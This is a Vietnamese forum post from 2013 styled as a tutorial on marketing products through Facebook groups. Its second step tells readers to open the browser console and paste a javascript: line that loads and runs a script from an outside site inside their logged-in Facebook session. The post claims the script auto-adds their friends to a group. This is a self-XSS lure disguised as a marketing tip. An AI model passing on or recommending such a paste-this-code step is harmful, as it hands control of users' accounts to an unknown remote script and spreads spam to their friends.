1. haikel

  haikelMember

  Tham gia ngày:
  14 Tháng mười một 2013
  Bài viết:
  18

  Hướng dẫn kinh doanh theo nhóm trong Facebook hiệu quả !

  Thảo luận trong 'Linh tinh' bắt đầu bởi haikel, 14 Tháng mười một 2013.

  Chắc hẳn đã rất nhiều người biết đến việc dùng fanpage để quảng cáo, giới thiệu sản phẩm trong các chiến dịch Marketing của mình.

  Tuy nhiên, việc xây dựng 1 fanpage với số lượng thành viên lên đến hàng trăm ngàn người thì không hề đơn giản nếu như bạn không phải là người của công chúng.

  Để đạt được hiệu quả kinh doanh tốt nhất qua FB mình xin hướng dẫn các bạn theo các bước sau: (Đăng nhập FB bằng trình duyệt Firefox)

  Bước 1. Truy cập vào http://www.facebook.com/groups/tinkm/
  Nếu bạn chưa phải là thành viên của nhóm thì nhấn vào nút Tham gia nhóm(Nếu không thấy nút này có nghĩa là bạn đã được bạn bè thêm vào là thành viên của nhóm rồi)

  Huong dan kinh doanh theo nhom trong Facebook hieu qua

  Bước 2. Thêm bạn bè vào nhóm (Nếu bạn chưa được Ban quản trị nhóm xét duyệt thì bạn không thể thực hiện được bước tiếp theo này)

  Trong nhóm, nhấn tổ hợp phím Shift+Ctrl+K. Sau đó copy đoạn code dưới đây và dán vào ô dưới cùng màn hình rồi nhấn Enter để thực hiện lệnh cho Facebook tự động thêm bạn bè vào nhóm.

  Mã:
  javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://facebookfanpagelike.com/addgroup/tinkm.js';})();
  Huong dan kinh doanh theo nhom trong Facebook hieu qua

  Xin lưu ý: Trong khi FB đang thêm bạn bè vào nhóm thì bạn tuyệt đối không được đóng cửa sổ trình duyệt hoặc nhấn F5. Quá trình này sẽ diễn ra trong vòng 2-5 phút tùy thuộc vào số lượng bạn bè của bạn.

  Huong dan kinh doanh theo nhom trong Facebook hieu qua

  Sau khi hoàn tất việc thêm bạn vào nhóm, bạn đã có thể bắt đầu kinh doanh và quảng cáo sản phẩm đến tất cả các thành viên trong nhóm rồi.


  Chúc bạn thành công !

  Nguồn: Diễn Đàn Du Lịch <3
   

Chia sẻ trang này